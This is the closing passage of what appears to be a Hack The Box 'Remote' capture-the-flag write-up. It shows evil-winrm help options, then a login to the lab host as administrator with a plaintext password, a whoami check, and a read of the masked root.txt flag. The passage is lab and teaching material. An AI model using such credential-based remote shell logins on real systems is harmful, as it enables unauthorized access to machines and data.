-u, --user USER Username (required if not using kerberos)
-p, --password PASS Password
-H, --hash NTHash NTHash
-P, --port PORT Remote host port (default 5985)
-V, --version Show version
-n, --no-colors Disable colors
-h, --help Display this help message

Escalate:

root@JIYE:~/htb/remote/evil-winrm# ruby evil-winrm.rb -u 'administrator' -p '!R3m0te!' -i '10.10.10.180'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd\
*Evil-WinRM* PS C:\> whoami
remote\administrator

Find root.txt:

*Evil-WinRM* PS C:\users\administrator> cd desktop
*Evil-WinRM* PS C:\users\administrator\desktop> dir


Directory: C:\users\administrator\desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/31/2020 10:33 AM 34 root.txt


*Evil-WinRM* PS C:\users\administrator\desktop> type root.txt
*********************************************
*Evil-WinRM* PS C:\users\administrator\desktop>